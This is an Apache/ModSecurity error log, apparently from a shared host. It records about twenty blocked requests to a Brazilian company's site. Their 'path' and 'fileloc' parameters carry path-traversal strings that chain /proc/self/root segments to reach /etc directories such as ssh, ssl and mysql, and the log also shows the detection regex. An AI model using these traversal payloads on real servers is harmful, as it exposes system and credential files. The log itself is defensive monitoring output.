[Fri Mar 20 06:32:09.854980 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:40706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UGV1pVZ5mVmJwsFMeaQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:11.405782 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.243.128:40722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UGxCii7xarUs8iHZWjgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:13.047148 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:40724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UHbninkcc-iUj5ApM2QAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:13.984059 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:35970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UHda6ubjKNq_cu4bBMAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:32:14.612908 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:40730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UHjJ3M9BSuKP7CAYF0QAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:15.279007 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.241.31:54964] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UH7ninkcc-iUj5ApM2wAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:32:16.122741 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:40732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UILninkcc-iUj5ApM3QAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:17.677795 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.243.128:40736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UIbninkcc-iUj5ApM4gAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:20.382977 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:40742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UJPqxLDW4GITHUkTTdwAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:22.138897 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.243.128:58022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UJjJ3M9BSuKP7CAYF1gAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:25.723007 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:58028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UKda6ubjKNq_cu4bBNgAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:27.362921 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:58044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UK_XLqtnMIWvjpaKI0gAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:32:31.675119 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:58058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UL_qxLDW4GITHUkTTfgAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:32:41.200686 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.243.128:50698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UOfHIg5MgXLBnicPn1wAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:33:03.325707 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.241.31:54976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UTbninkcc-iUj5ApNJAAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:33:10.742217 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.241.31:50206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UVvXLqtnMIWvjpaKI9wAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:33:17.419946 2026] [:error] [pid 31215:tid 140411624429312] [client 74.7.241.31:58950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UXQF0L0L-SsrnPo5WSwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:33:20.774421 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:55038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UYNa6ubjKNq_cu4bBUgAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:33:49.232983 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.243.128:46326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UfQF0L0L-SsrnPo5WWwAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:33:55.921503 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:58426] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ug9a6ubjKNq_cu4bBbAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:06.853473 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.241.31:55050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ujrninkcc-iUj5ApNZAAAA4M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
